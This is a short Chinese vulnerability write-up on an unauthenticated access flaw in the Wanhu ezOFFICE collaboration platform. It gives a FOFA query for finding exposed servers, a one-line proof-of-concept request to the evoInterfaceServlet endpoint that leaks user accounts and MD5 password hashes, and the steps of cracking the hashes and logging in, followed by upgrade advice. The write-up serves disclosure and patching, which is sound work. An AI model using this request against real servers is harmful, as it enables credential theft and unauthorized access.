前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。
二、漏洞描述
该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet
接口获得系统登录账号和用MD5加密的密码
三、影响范围
version <=12.4.12.25
四、复现环境
FOFA:title=“万户ezOFFICE”
五、漏洞复现
1.POC
IP:port/defaultroot/evoInterfaceServlet?paramType=user
2.拿到MD5去解密
3.登录成功
六、修复建议
该漏洞仅影响较低版本,目前厂家已修复,可前往官网升级
http://www.whir.net/